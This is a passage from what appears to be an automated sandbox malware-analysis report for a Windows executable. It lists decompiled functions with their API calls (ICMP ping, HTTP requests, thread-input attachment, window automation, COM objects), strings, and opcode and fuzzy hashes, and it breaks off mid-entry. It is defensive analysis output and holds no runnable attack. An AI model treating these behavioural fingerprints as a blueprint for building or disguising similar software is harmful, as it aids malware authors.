                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                  • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                  • API String ID: 834269672-1287834457
                                                                  • Opcode ID: 4b82be25b9ca6bf4145607dcfb379d6c93eb0e4072df28b140b84edfdf218241
                                                                  • Instruction ID: d37726ff0ea317c8b71a5ca9aebcbde305c7ffaef9bad57a6a1d7456bb5c49b3
                                                                  • Opcode Fuzzy Hash: 4b82be25b9ca6bf4145607dcfb379d6c93eb0e4072df28b140b84edfdf218241
                                                                  • Instruction Fuzzy Hash: 6C619E716083129FC710DF64C848F6BB7E8AF89754F044A59F9869B2A1CF74ED44CB92
                                                                  Function 00965732 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • WSAStartup.WSOCK32(00000101,?), ref: 00965793
                                                                  • inet_addr.WSOCK32(?,?,?), ref: 009657D8
                                                                  • gethostbyname.WSOCK32(?), ref: 009657E4
                                                                  • IcmpCreateFile.IPHLPAPI ref: 009657F2
                                                                  • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00965862
                                                                  • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00965878
                                                                  • IcmpCloseHandle.IPHLPAPI(00000000), ref: 009658ED
                                                                  • WSACleanup.WSOCK32 ref: 009658F3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                  • String ID: Ping
                                                                  • API String ID: 1028309954-2246546115
                                                                  • Opcode ID: 50c91399b20282a8438e6bc744f0c88c2761c14fc16983ae9fe6e1d99f24bc1a
                                                                  • Instruction ID: e20f2d24839a27c24b747f5bf32a752d4819c3443bda20630f0107223b300477
                                                                  • Opcode Fuzzy Hash: 50c91399b20282a8438e6bc744f0c88c2761c14fc16983ae9fe6e1d99f24bc1a
                                                                  • Instruction Fuzzy Hash: DF516E316047009FD710DF24DC45B2A77E4FF49720F054929FA9AEB2A1DB70E840DB52
                                                                  Function 0095B4C3 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0095B4D0
                                                                  • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0095B546
                                                                  • GetLastError.KERNEL32 ref: 0095B550
                                                                  • SetErrorMode.KERNEL32(00000000,READY), ref: 0095B5BD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Error$Mode$DiskFreeLastSpace
                                                                  • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                  • API String ID: 4194297153-14809454
                                                                  • Opcode ID: 8654a4d712f73d280395d051ae5ef358e20fa9d0fa833e8e8e607089e27db4b8
                                                                  • Instruction ID: 930188cbc1b481678562aacc517bc1ebf7a487cf96079b78c070c5e1f8727117
                                                                  • Opcode Fuzzy Hash: 8654a4d712f73d280395d051ae5ef358e20fa9d0fa833e8e8e607089e27db4b8
                                                                  • Instruction Fuzzy Hash: 0F31B235A00209DFCB04DF69C845EBE7BB8FF49306F104065FA05E7291EB709A46CB91
                                                                  Function 00948F8F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 008F7DE1: _memmove.LIBCMT ref: 008F7E22
                                                                    • Part of subcall function 0094AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0094AABC
                                                                  • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00949014
                                                                  • GetDlgCtrlID.USER32 ref: 0094901F
                                                                  • GetParent.USER32 ref: 0094903B
                                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 0094903E
                                                                  • GetDlgCtrlID.USER32(?), ref: 00949047
                                                                  • GetParent.USER32(?), ref: 00949063
                                                                  • SendMessageW.USER32(00000000,?,?,00000111), ref: 00949066
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                  • String ID: ComboBox$ListBox
                                                                  • API String ID: 1536045017-1403004172
                                                                  • Opcode ID: f7254764e661f3b859841fd87c27e69dd8155ac0120b95637eaad607ed747eb4
                                                                  • Instruction ID: f230ef17bf1ef37619e621f52eedbf41f07d008baa02215ba712aa628c53c717
                                                                  • Opcode Fuzzy Hash: f7254764e661f3b859841fd87c27e69dd8155ac0120b95637eaad607ed747eb4
                                                                  • Instruction Fuzzy Hash: 2921D371A04108BFDF04ABB4CC95EFEBBB9EF89310F100155FA21A72A1DB795859DA20
                                                                  Function 0094907A Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 008F7DE1: _memmove.LIBCMT ref: 008F7E22
                                                                    • Part of subcall function 0094AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0094AABC
                                                                  • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 009490FD
                                                                  • GetDlgCtrlID.USER32 ref: 00949108
                                                                  • GetParent.USER32 ref: 00949124
                                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 00949127
                                                                  • GetDlgCtrlID.USER32(?), ref: 00949130
                                                                  • GetParent.USER32(?), ref: 0094914C
                                                                  • SendMessageW.USER32(00000000,?,?,00000111), ref: 0094914F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                  • String ID: ComboBox$ListBox
                                                                  • API String ID: 1536045017-1403004172
                                                                  • Opcode ID: d862d3777bfb5859081b2d79a880935ad654b22837a8ef934b3c55985cdba39e
                                                                  • Instruction ID: 2c44a7a92e9953fa302dc2b85334d180bf8cbab072cbfacee106320761dbf8a4
                                                                  • Opcode Fuzzy Hash: d862d3777bfb5859081b2d79a880935ad654b22837a8ef934b3c55985cdba39e
                                                                  • Instruction Fuzzy Hash: 1121D375A04108BFDF04ABA4CC85EFEBB78EF48300F000015FA15A72A1DB794855DA21
                                                                  Function 00949163 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetParent.USER32 ref: 0094916F
                                                                  • GetClassNameW.USER32(00000000,?,00000100), ref: 00949184
                                                                  • _wcscmp.LIBCMT ref: 00949196
                                                                  • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00949211
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: ClassMessageNameParentSend_wcscmp
                                                                  • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                  • API String ID: 1704125052-3381328864
                                                                  • Opcode ID: 37efaff5c542c2395b26f58e860af79c35040c0d9531069c1b47e403f2dfaeaa
                                                                  • Instruction ID: 37eee0772c22eeccddc6e4f5ce5bc1ef8ec35b7e945574532068ce510163bbbe
                                                                  • Opcode Fuzzy Hash: 37efaff5c542c2395b26f58e860af79c35040c0d9531069c1b47e403f2dfaeaa
                                                                  • Instruction Fuzzy Hash: BF112C3734C30BB9FB113724DC0BDE7779C9B95728F200427F924A40D1FEA268A15594
                                                                  Function 009688AB Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VariantInit.OLEAUT32(?), ref: 009688D7
                                                                  • CoInitialize.OLE32(00000000), ref: 00968904
                                                                  • CoUninitialize.OLE32 ref: 0096890E
                                                                  • GetRunningObjectTable.OLE32(00000000,?), ref: 00968A0E
                                                                  • SetErrorMode.KERNEL32(00000001,00000029), ref: 00968B3B
                                                                  • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00982C0C), ref: 00968B6F
                                                                  • CoGetObject.OLE32(?,00000000,00982C0C,?), ref: 00968B92
                                                                  • SetErrorMode.KERNEL32(00000000), ref: 00968BA5
                                                                  • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00968C25
                                                                  • VariantClear.OLEAUT32(?), ref: 00968C35
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                  • String ID:
                                                                  • API String ID: 2395222682-0
                                                                  • Opcode ID: 77875ca7526d7572c9cc92e4d84431574f4679af22d6f75c35225b61db7f1c5c
                                                                  • Instruction ID: e4a4e965cb4b3e712b10e64bb21ab5ae71169e7a7d9c9bc5439671a0fa92a687
                                                                  • Opcode Fuzzy Hash: 77875ca7526d7572c9cc92e4d84431574f4679af22d6f75c35225b61db7f1c5c
                                                                  • Instruction Fuzzy Hash: 98C1F3B1608305AFC700DF68C884A6BB7E9FF89348F004A5DF98A9B251DB71ED45CB52
                                                                  Function 00957990 Relevance: 15.3, APIs: 10, Instructions: 292COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00957A6C
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: ArraySafeVartype
                                                                  • String ID:
                                                                  • API String ID: 1725837607-0
                                                                  • Opcode ID: a4e50a4dd3a3ed896a11a6b84340633d479008aae30b64b4bf4302728d4a8a0d
                                                                  • Instruction ID: 026f8705af6d85e519bd437d898d324f5078ce0ba09a5912f5350d114c89b913
                                                                  • Opcode Fuzzy Hash: a4e50a4dd3a3ed896a11a6b84340633d479008aae30b64b4bf4302728d4a8a0d
                                                                  • Instruction Fuzzy Hash: 7EB18F719082099FDB00DFE6E895BBEB7B8FF49322F104425E941E7351D734AA49CBA1
                                                                  Function 009511CE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetCurrentThreadId.KERNEL32 ref: 009511F0
                                                                  • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00950268,?,00000001), ref: 00951204
                                                                  • GetWindowThreadProcessId.USER32(00000000), ref: 0095120B
                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00950268,?,00000001), ref: 0095121A
                                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 0095122C
                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00950268,?,00000001), ref: 00951245
                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00950268,?,00000001), ref: 00951257
                                                                  • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00950268,?,00000001), ref: 0095129C
                                                                  • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00950268,?,00000001), ref: 009512B1
                                                                  • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00950268,?,00000001), ref: 009512BC
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                  • String ID:
                                                                  • API String ID: 2156557900-0
                                                                  • Opcode ID: f6e0fa9ded0bf847287a8fa57f65cac2f23fd183f351db1ef7280f6fd9506446
                                                                  • Instruction ID: deba6adac74a7e72d7199b92e26b2ee5500e28643e1d486eccbcb136396beb2a
                                                                  • Opcode Fuzzy Hash: f6e0fa9ded0bf847287a8fa57f65cac2f23fd183f351db1ef7280f6fd9506446
                                                                  • Instruction Fuzzy Hash: 5A31EE76A28208FBDB10DF51ED88F7937ADEB54722F104225FC14D61A0D778ADC4AB60
                                                                  Function 008FFA5D Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 008FFAA6
                                                                  • OleUninitialize.OLE32(?,00000000), ref: 008FFB45
                                                                  • UnregisterHotKey.USER32(?), ref: 008FFC9C
                                                                  • DestroyWindow.USER32(?), ref: 009345D6
                                                                  • FreeLibrary.KERNEL32(?), ref: 0093463B
                                                                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00934668
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                  • String ID: close all
                                                                  • API String ID: 469580280-3243417748
                                                                  • Opcode ID: c06c094f0dddc8967f120d0afdd5af7cf02d412c8258c1c7808cabfd4775cb6f
                                                                  • Instruction ID: 63472aa78961c208777c8a930966bbf55bb10e0602050de00594e8d654283257
                                                                  • Opcode Fuzzy Hash: c06c094f0dddc8967f120d0afdd5af7cf02d412c8258c1c7808cabfd4775cb6f
                                                                  • Instruction Fuzzy Hash: 5CA16C3170121ACFDB18EF24C5A5A79F364FF45714F1142ADEA0AAB262CB30AD56CF51
                                                                  Function 0094A068 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • EnumChildWindows.USER32(?,0094A439), ref: 0094A377
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: ChildEnumWindows
                                                                  • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                  • API String ID: 3555792229-1603158881
                                                                  • Opcode ID: 77cc4ee673e66ee155a0cf7d7b244fb33f862705c49fe78cdd373c8ba4f4c640
                                                                  • Instruction ID: b91a5bd3e171c6204cbb3fdd03ebfee70aa13c400580c9debb00f9ee0141eaee
                                                                  • Opcode Fuzzy Hash: 77cc4ee673e66ee155a0cf7d7b244fb33f862705c49fe78cdd373c8ba4f4c640
                                                                  • Instruction Fuzzy Hash: AF91E43164060AAADB18DFA0C852FEEFBB8FF84300F508119E859A7141DF716999DBD1
                                                                  Function 008F2E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetWindowLongW.USER32(?,000000EB), ref: 008F2EAE
                                                                    • Part of subcall function 008F1DB3: GetClientRect.USER32(?,?), ref: 008F1DDC
                                                                    • Part of subcall function 008F1DB3: GetWindowRect.USER32(?,?), ref: 008F1E1D
                                                                    • Part of subcall function 008F1DB3: ScreenToClient.USER32(?,?), ref: 008F1E45
                                                                  • GetDC.USER32 ref: 0092CD32
                                                                  • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0092CD45
                                                                  • SelectObject.GDI32(00000000,00000000), ref: 0092CD53
                                                                  • SelectObject.GDI32(00000000,00000000), ref: 0092CD68
                                                                  • ReleaseDC.USER32(?,00000000), ref: 0092CD70
                                                                  • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0092CDFB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                  • String ID: U
                                                                  • API String ID: 4009187628-3372436214
                                                                  • Opcode ID: 8a746a4ab1aa9539dd2465410ed7d1153943bab95f3fe2493b58d8452aef66d7
                                                                  • Instruction ID: c62e0470fc7af390452b974ba7d5cb3a205bfe6e8df414a12e1e467d133481d8
                                                                  • Opcode Fuzzy Hash: 8a746a4ab1aa9539dd2465410ed7d1153943bab95f3fe2493b58d8452aef66d7
                                                                  • Instruction Fuzzy Hash: FE71C371500209DFCF21DF64D894ABE7BB9FF48324F24467AED599A2AAC7308C80DB50
                                                                  Function 00961A15 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00961A50
                                                                  • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00961A7C
                                                                  • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00961ABE
                                                                  • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00961AD3
                                                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00961AE0
                                                                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00961B10
                                                                  • InternetCloseHandle.WININET(00000000), ref: 00961B57
                                                                    • Part of subcall function 00962483: GetLastError.KERNEL32(?,?,00961817,00000000,00000000,00000001), ref: 00962498
                                                                    • Part of subcall function 00962483: SetEvent.KERNEL32(?,?,00961817,00000000,00000000,00000001), ref: 009624AD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                                  • String ID:
                                                                  • API String ID: 2603140658-3916222277
                                                                  • Opcode ID: 38d89ea3f52a4a25bb88b73d1598aff7ef1d072baf1e92f7bf04b12ca4267c3c
                                                                  • Instruction ID: 2264e80f47b33e9fb6796d9c16bf9ef3d421aaf913d65af35a367fc59169ee44
                                                                  • Opcode Fuzzy Hash: 38d89ea3f52a4a25bb88b73d1598aff7ef1d072baf1e92f7bf04b12ca4267c3c
                                                                  • Instruction Fuzzy Hash: 2541A1B1501608BFEB158F60CC95FFB7BACEF08354F048126F905AA145E7749E409BA4
                                                                  Function 00968C46 Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0097F910), ref: 00968D28
                                                                  • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0097F910), ref: 00968D5C
                                                                  • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00968ED6
                                                                  • SysFreeString.OLEAUT32(?), ref: 00968F00
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                  • String ID:
                                                                  • API String ID: 560350794-0
                                                                  • Opcode ID: 39315ae7e237d31215bbcbfe141705d169c9e2fcf51e32696365b86f7222b4a3
                                                                  • Instruction ID: d911d828b6c53bc41d5dca5a1a599040ac2c5bf29820e9acd0d98c210f8b55d4
                                                                  • Opcode Fuzzy Hash: 39315ae7e237d31215bbcbfe141705d169c9e2fcf51e32696365b86f7222b4a3
                                                                  • Instruction Fuzzy Hash: EEF14C71A00209EFCF14DF94C888EAEB7B9FF49314F108599F915AB251DB31AE45CB91
                                                                  Function 0096F694 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
                                                                  Download Yara Rule
